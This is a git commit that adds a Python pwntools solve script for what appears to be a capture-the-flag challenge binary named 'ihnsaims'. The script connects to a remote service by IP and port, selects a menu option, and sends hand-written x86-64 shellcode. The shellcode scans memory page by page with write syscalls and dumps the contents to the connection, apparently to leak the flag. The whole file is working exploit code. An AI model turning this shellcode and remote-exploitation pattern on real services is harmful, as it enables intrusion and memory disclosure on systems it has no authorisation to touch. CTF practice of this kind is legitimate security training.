solve script

2024-11-15 23:48:35 +03:00
parent 5fade1f343
commit c71564b667
1 changed files with 36 additions and 0 deletions
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./ihnsaims", checksec=False)
+# r = process("./ihnsaims flag{fake_flag}", shell=True)
+r = remote("54.85.45.101", 8002)
+
+# funcs
+s = lambda a: r.sendafter(b"!\n", a)
+
+# write
+s(b"1")
+
+# shellcode
+sc = """
+lea r12, [rdx]
+a:
+lea r12, [r12+0x1000]
+mov rdi, 1
+mov rsi, r12
+mov rdx, 0x1000
+mov rax, 1
+syscall
+cmp rax, -14
+je a
+jne b
+b:
+xor rdi, rdi
+mov rax, 231
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()